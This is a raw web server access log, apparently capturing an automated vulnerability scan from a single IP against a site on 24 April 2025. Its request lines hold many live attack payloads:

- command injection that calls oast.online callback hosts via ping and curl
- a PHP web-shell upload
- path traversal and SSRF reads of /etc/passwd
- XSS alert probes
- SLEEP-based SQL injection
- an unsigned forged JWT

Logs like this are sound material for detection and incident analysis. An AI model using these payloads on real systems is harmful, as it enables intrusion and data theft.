Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:08:44 -0400] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2w9rfXLxu0JUmyMsVrVtTu7y9ae.pHp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:08:51 -0400] "GET /wp-content/uploads/cfom_files/2w9rfxlxu0jumymsvrvttu7y9ae.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:09:12 -0400] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0" 154.84.62.234 - - [24/Apr/2025:09:09:14 -0400] "POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d04qr7ij4pq19d75k4903drhjy5qxpjeb.oast.online) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.45" 154.84.62.234 - - [24/Apr/2025:09:09:47 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:09:09:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:09:10:05 -0400] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:10:10 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4" 154.84.62.234 - - [24/Apr/2025:09:10:58 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:11:19 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:12:35 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:09:12:36 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:12:38 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:13:09 -0400] "GET /?paytm_action=curltest&url=d04qr7ij4pq19d75k490os376tipkpeiw.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:13:23 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:09:13:31 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:13:31 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:13:40 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:13:43 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:14:39 -0400] "GET /?phonepe_action=curltestPhonePe&url=http://d04qr7ij4pq19d75k49078t14n9d1tcej.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:16:49 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:16:57 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:16:57 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:17:07 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 154.84.62.234 - - [24/Apr/2025:09:17:13 -0400] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 154.84.62.234 - - [24/Apr/2025:09:17:13 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:17:18 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:17:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5" 154.84.62.234 - - [24/Apr/2025:09:17:39 -0400] "POST /SamlResponseServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:18:35 -0400] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" 154.84.62.234 - - [24/Apr/2025:09:19:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:19:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:19:34 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:19:44 -0400] "GET /libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:19:45 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/618.25.8 (KHTML, like Gecko) Version/17.3 Safari/618.25.8" 154.84.62.234 - - [24/Apr/2025:09:20:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:22:58 -0400] "POST /search-request.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:23:36 -0400] "POST /banker/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" 154.84.62.234 - - [24/Apr/2025:09:23:39 -0400] "POST /search-locker-details.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:09:23:42 -0400] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_7; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:24:04 -0400] "POST /goanywhere/lic/accept HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:24:05 -0400] "GET /flash/addcrypted2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:24:13 -0400] "POST /flash/addcrypted2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:09:26:16 -0400] "GET /accounts/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:26:35 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:27:25 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:27:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:27:38 -0400] "GET /?s=<%2Fscript><script>alert%28document.domain%29<%2Fscript> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:09:27:56 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:28:11 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:28:12 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:28:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:09:28:36 -0400] "POST /jeecg-boot/jmreport/qurestSql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:28:42 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:28:46 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:09:29:08 -0400] "POST /index.php?c=blocked&action=continue HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:29:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:29:29 -0400] "POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:09:30:11 -0400] "GET /queues HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:30:34 -0400] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:31:50 -0400] "GET /index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:32:01 -0400] "GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:32:46 -0400] "POST /saas./resttosaasservlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.27" 154.84.62.234 - - [24/Apr/2025:09:33:11 -0400] "GET /csrf HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:33:45 -0400] "GET /api/v2/parameters/core/ HTTP/1.1" 200 0 "-" "7h3h4ckv157" 154.84.62.234 - - [24/Apr/2025:09:34:02 -0400] "POST /kubepi/api/v1/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:34:09 -0400] "POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:34:29 -0400] "POST /json/setup-restore.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:09:34:50 -0400] "POST /template/aui/text-inline.vm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:35:32 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:09:35:37 -0400] "POST /spcgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:36:11 -0400] "GET /api/auth/cognito/callback?access_token=oenbmsnn&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoieHdxdXdoem9kciIsImVtYWlsIjoie3tlbWFpbH19In0=. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/25.0.1 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:37:03 -0400] "POST /spcgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:37:13 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 139.99.50.198 - - [24/Apr/2025:09:37:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:37:20 -0400] "GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0" 139.99.50.198 - - [24/Apr/2025:09:37:20 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 139.99.50.198 - - [24/Apr/2025:09:37:23 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:37:28 -0400] "GET /downloader.php?file=%3Becho+CVE-2023-23333|rev%00.zip HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:38:28 -0400] "GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:38:30 -0400] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:38:32 -0400] "GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:09:38:33 -0400] "GET /setup/setupadministrator-start.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:09:38:33 -0400] "GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:09:38:35 -0400] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:09:38:36 -0400] "POST /ajax/api/user/save HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:38:39 -0400] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2w9rfR03cz93oiHqoP6y19rIlO3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12" 154.84.62.234 - - [24/Apr/2025:09:38:44 -0400] "GET /setup/setupadministrator-start.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:09:38:49 -0400] "POST /setup/setupadministrator.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 154.84.62.234 - - [24/Apr/2025:09:38:54 -0400] "POST /dologin.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:38:58 -0400] "GET /welcome.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:39:06 -0400] "POST /api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:12 -0400] "POST /api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.34" 154.84.62.234 - - [24/Apr/2025:09:39:22 -0400] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:30 -0400] "POST /api/jmeter/download/files HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:39:44 -0400] "GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:09:39:52 -0400] "GET /forms/doLogin?login_username=admin&password=password$(curl%20d04qr7ij4pq19d75k49074geyrmwiop8j.oast.online)&x=0&y=0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:40:35 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - 